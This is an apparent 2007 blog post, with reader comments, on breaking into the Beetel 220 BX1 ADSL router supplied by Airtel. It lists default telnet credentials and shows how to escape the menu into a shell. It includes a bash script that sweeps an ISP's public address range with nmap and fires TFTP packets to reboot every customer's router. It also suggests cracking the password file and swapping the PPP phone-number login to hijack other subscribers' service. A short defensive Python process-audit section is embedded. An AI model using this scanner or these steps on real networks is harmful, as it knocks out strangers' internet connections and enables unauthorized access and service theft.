Airtel Broadband supplies its users with the "Beetel 220 BX1" ADSL2+ CPE.
This Beetel product runs an embedded Linux (probably some stripped-down build).
There are quite a number of services running on the system. I am going to explain how to HACK (not crack) into the box for fun & profit.
The box comes with default IP Gateway = 192.168.1.1
and your machine gets the 192.168.1.2 address.
What you have to do is:
telnet 192.168.1.1
There are 3 usernames by default:
"admin"
"support"
"user"
and their default passwords are:
USERNAME    PASSWORD
admin       password
support     supportuser
user        normaluser
Now you can log into the machine.
It differs a bit from a normal Linux box, but that's fine. It's nice.
You will be greeted by a menu like:
Note: If you have problem with Backspace key, please make sure you configure your terminal emulator settings. For instance, from HyperTerminal you would need to use File->Properties->Setting->Back Space key sends.
Main Menu
1. ADSL Link State
2. LAN
3. WAN
4. DNS Server
5. Route Setup
6. NAT
7. Firewall
8. Quality Of Service
9. Management
10. Passwords
11. Reset to Default
12. Save and Reboot
13. Exit
->
This menu is just one lame script; you can exit (bypass) it by typing the "sh" command.
Now you have a ~somewhat~ workable shell (console).
Type "help" and you will get:
Built-in commands:
-------------------
. : break cd continue eval exec exit export help login newgrp
read readonly set shift times trap umask wait [ busybox cat df
dmesg echo expr false ifconfig init insmod kill klogd linuxrc
logger logread mkdir mount msh ping ps pwd reboot rm rmmod route
sendarp sh sysinfo syslogd test tftp tftpd true tty vconfig
Now try ls, ls -a, ls -al ... mmmmmm, none of them work (there is no ls applet in this busybox build). What to do now?
ls <--- does not work ...
So we use the shell's own globbing as an alternative, "echo *", like on the very old Digital Unix boxes we had in college (KGP).
On doing "echo *":
# echo *
bin dev etc lib linuxrc mnt proc sbin usr var webs
#
OK, now this looks a bit better, thank God (if any exists) ...
Next step: do a ps -xa :))
# ps -xa
PID Uid VmSize Stat Command
1 admin 248 S init
2 admin SWN [ksoftirqd/0]
3 admin SW< [events/0]
4 admin SW< [khelper]
5 admin SW< [kblockd/0]
6 admin SW [pdflush]
7 admin SW [pdflush]
8 admin SW [kswapd0]
9 admin SW< [aio/0]
10 admin SW [mtdblockd]
17 admin 292 S -sh
35 admin 532 S cfm
121 admin 176 S pvc2684d
205 admin 212 S dhcpd
211 admin 280 S syslogd -C -l 7
212 admin 540 S telnetd
216 admin 148 S bftpd
219 admin 180 S tftpd
220 admin 648 S httpd
222 admin 216 S klogd
226 admin 332 S pppd -c 1.32.1 -r airtel -i nas_1_32 -u 040xxxxxxxxxxxx
274 admin 196 S /bin/dnsprobe
278 admin 268 S upnp -L br0 -W ppp_1_32_1 -D
339 admin 600 S telnetd
340 admin 264 S sh -c sh
341 admin 304 S sh
345 admin 248 R ps -xa
#
Holy ... so many processes running in this small box :-P
Now, what processor does it have? :-O
Let's check:
# cd /proc
# echo *
1 10 121 17 2 205 211 212 216 219 220 222 226 274 278 286 3 339 340 341 35 4 5 6 7 8 9 buddyinfo bus cmdline cpuinfo devices diskstats driver execdomains filesystems fs interrupts iomem ioports irq kcore kmsg loadavg locks meminfo misc modules mounts mtd net partitions self slabinfo stat sys sysvipc tty uptime var version vmstat
# cat cpuinfo
system type : 96338L-2M-8M
processor : 0
cpu model : BCM6338 V1.0
BogoMIPS : 235.52
wait instruction : no
microsecond timers : yes
tlb_entries : 32
extra interrupt vector : yes
hardware watchpoint : no
VCED exceptions : not available
VCEI exceptions : not available
#
Hmmmm ... and the memory:
# cat meminfo
MemTotal: 6164 kB
MemFree: 520 kB
Buffers: 80 kB
Cached: 1144 kB
SwapCached: 0 kB
Active: 2172 kB
Inactive: 112 kB
HighTotal: 0 kB
HighFree: 0 kB
LowTotal: 6164 kB
LowFree: 520 kB
SwapTotal: 0 kB
SwapFree: 0 kB
Dirty: 0 kB
Writeback: 0 kB
Mapped: 2036 kB
Slab: 2104 kB
Committed_AS: 2916 kB
PageTables: 304 kB
VmallocTotal: 1048560 kB
VmallocUsed: 688 kB
VmallocChunk: 1047836 kB
#
Man, this box is such a bottleneck ... :(( [maybe this is why my net is always so slow :p]
# cat /etc/issue
cat: /etc/issue: No such file or directory
#
Hmmmm ... no /etc/issue. Let's try /proc/version instead:
# cat /proc/version
Linux version 2.6.8.1 (root@localhost.localdomain) (gcc version 3.4.2) #1 Fri Dec 23 09:56:55 CST 2005
#
Hmmm ... gcc in the version string :)) Well, I think I can have fun ..... :)) =)) >:) \:D/ <:-p
# gcc
gcc: not found
# cc
cc: not found
#
:(( Guess not .... :(( What fun is Linux without gcc?
Maybe that's exactly why they left it out, to stop us having fun :P ... well, we will still have fun .... :D
121 admin 176 S pvc2684d
205 admin 212 S dhcpd
211 admin 280 S syslogd -C -l 7
212 admin 540 S telnetd
216 admin 148 S bftpd
219 admin 180 S tftpd
220 admin 648 S httpd
222 admin 216 S klogd
226 admin 332 S pppd -c 1.32.1 -r airtel -i nas_1_32 -u 040XXXXXX <--- (X)
274 admin 196 S /bin/dnsprobe
278 admin 268 S upnp -L br0 -W ppp_1_32_1 -D
339 admin 600 S telnetd
340 admin 264 S sh -c sh
341 admin 308 S sh
355 admin 248 R ps -xa
(X) == your phone number (040400XXXXX)
NOW ...
The servers running on the box are of interest:
httpd, tftpd, bftpd, telnetd.
What next?
Well, we will start fuzzing these daemons and see what comes out.
[I will just give an example with tftpd; the source of a client is attached with it, plus a tiny script which scans a Class B network and reboots the boxes :-P]
[This is how you can have fun; people who know the VA (vulnerability assessment) process know what to do next.]
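From the defender's side, the process listing above already tells an auditor most of what matters: which management daemons exist, whether a remote shell is currently live, and that the PPP username (the phone number) sits in plain sight on a command line. The following parser and audit are my own added example, not code from the post; MANAGEMENT_DAEMONS is my assumption about which daemons count as a management surface, and the sample rows are copied from the listing with the username masked as the post masks it.

```python
from collections import Counter
# Constructed sample: rows from the busybox `ps -xa` listing above, PPP username masked as in the post.
PS_OUTPUT = """\
PID Uid VmSize Stat Command
1 admin 248 S init
2 admin SWN [ksoftirqd/0]
17 admin 292 S -sh
212 admin 540 S telnetd
216 admin 148 S bftpd
219 admin 180 S tftpd
220 admin 648 S httpd
226 admin 332 S pppd -c 1.32.1 -r airtel -i nas_1_32 -u 040XXXXXX
278 admin 268 S upnp -L br0 -W ppp_1_32_1 -D
339 admin 600 S telnetd
340 admin 264 S sh -c sh
"""
# My own list of daemons that expose a management surface on this CPE (assumption).
MANAGEMENT_DAEMONS = {"telnetd", "tftpd", "bftpd", "httpd", "upnp"}

def parse_ps(text):
    # Busybox ps rows: PID Uid [VmSize] Stat Command; kernel threads lack VmSize.
    procs = []
    for line in text.splitlines()[1:]:          # skip the header row
        f = line.split()
        if len(f) < 4:
            continue
        if f[2].isdigit():                       # user process: VmSize present
            vmsize, stat, argv = int(f[2]), f[3], f[4:]
        else:                                    # kernel thread: VmSize absent
            vmsize, stat, argv = None, f[2], f[3:]
        exe = argv[0]                            # "[kswapd0]" / "/bin/x" / "-sh"
        name = exe.strip("[]") if exe.startswith("[") else exe.rsplit("/", 1)[-1].lstrip("-")
        procs.append({"pid": int(f[0]), "uid": f[1], "vmsize": vmsize,
                      "stat": stat, "argv": argv, "name": name})
    return procs

def audit(text):
    # Summarise what the listing says about the box's exposure.
    procs = parse_ps(text)
    names = Counter(p["name"] for p in procs)
    ppp_user = None
    for p in procs:                              # credential material on the command line
        if p["name"] == "pppd" and "-u" in p["argv"]:
            ppp_user = p["argv"][p["argv"].index("-u") + 1]
    return {
        "exposed_services": sorted(n for n in names if n in MANAGEMENT_DAEMONS),
        "telnet_sessions": max(names["telnetd"] - 1, 0),  # each extra telnetd = a live session
        "ppp_user": ppp_user,
        "single_uid": len({p["uid"] for p in procs}) == 1,  # same uid everywhere: no privilege separation
    }
```

On the listing above this reports five management daemons, one live telnet session (the second telnetd with its sh -c sh child) and the masked PPP username, which is the checklist to take to the WAN-side firewall and password menus.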
Hey, check out the /etc directory.
There are a few cool files there, like passwd, default.cfg, etc.
default.cfg holds the base64-encoded password which is used when the box is reset to defaults,
and the passwd file can be cracked open by john in about a minute.
Try those.
Look through all the files which might give some info about the box; now that's hacking :)
OK ... now something NICE ... OK?
Now, what is this?
226 admin 332 S pppd -c 1.32.1 -r airtel -i nas_1_32 -u 040XXXXXX
Well, you tell me :)
It's a daemon (pppd) which is using your phone number (the -u argument) ... [:o why so?]
Who knows ... I am not going to give you any more answers, OTHERWISE I will be JAILED [:o hooooaaa ... wtf ... yes, since there are LAWS in INDIA now ... ;)]
But what if I changed the phone number .... what could I get? :-P
Who knows ... maybe you could hijack phones, or maybe you could get the same speed as the user the phone belongs to .... who knows ...
If you want to find out, please go ahead and do it on your own.
I wish you the best of luck .... and happy hacking :D
===== CODE =====
#!/bin/bash
var0=1
LIMIT=255
var1=1
while [ "$var1" -lt "$LIMIT" ]
do
    var1=`expr $var1 + 1`
    state=`nmap -sP -T Insane 122.169.$var1.1 | grep up | cut -d '(' -f2 | cut -d '.' -f1-3 | grep hosts | cut -d ' ' -f1 | wc -l`
    if [ $state -eq 0 ]
    then
        echo -ne "Sending Packet to $1.$var1 Network Segment\n"
        while [ "$var0" -lt "$LIMIT" ]
        do
            var0=`expr $var0 + 1` # var0=$(($var0+1)) also works.
            # var0=$((var0 + 1)) also works.
            # let "var0 += 1" also works.
            if [ $var0 -ne 159 ] #159 is my ipaddr so to not boot mine
            then
                ./tftp $1.$var1.$var0 69 S a > /dev/null 2>&1 &
            fi
        done # Various other methods also work.
        sleep 5s
    fi
done
echo
exit 0
===== END of CODE ======
./tftp == STANDARD TFTP CLIENT
Monday, September 24, 2007
2 comments:
Hello
I have seen your post and tried to implement it but was successfully unsuccessful. I am new to this stuff and don't know shell script, so I request you to help me in achieving this. I am desperately in need of it.
Thanks in ADVANCE
OK, now this is what I tried on my Nokia Siemens Networks C2110 (Dataone Broadband) ADSL modem:
telnet myADSL.router
*********************
Welcome to DSL MODEM
*********************
DSL MODEM Corporation, Software Release V55.1.04.01
Login: admin
Password: *********
Login successful
-->
After this I started digging and went for the help, which was the old-fashioned Cisco IOS style "?"; probably Joshua Thomas would know it from his college (KGP) days.
From the help, one thing that struck me was the "console" command. I remember back in my college days of IOS the "console en" command used to do some things, so I keyed it in and to my amazement was into the modem's OS with a prompt like "QUANTUM >" probably. But still all these commands like ls, cat etc. weren't active, so I tried HELP the good old-fashioned way. I saw a command called fm; it immediately struck me that it should be a file manager, and that it was. After that command I got into the file system and activated the commands:
append cat cp default
fsinfo info ls md5
mv rm version
I played around with all these commands for a while, and after some time the console got stuck and I was a bit scared that my connection would get fawked, so I quit experimenting.
I hope Joshua Thomas would throw some of his knowledge at experimenting on this li'l baby and show us some cool stuff.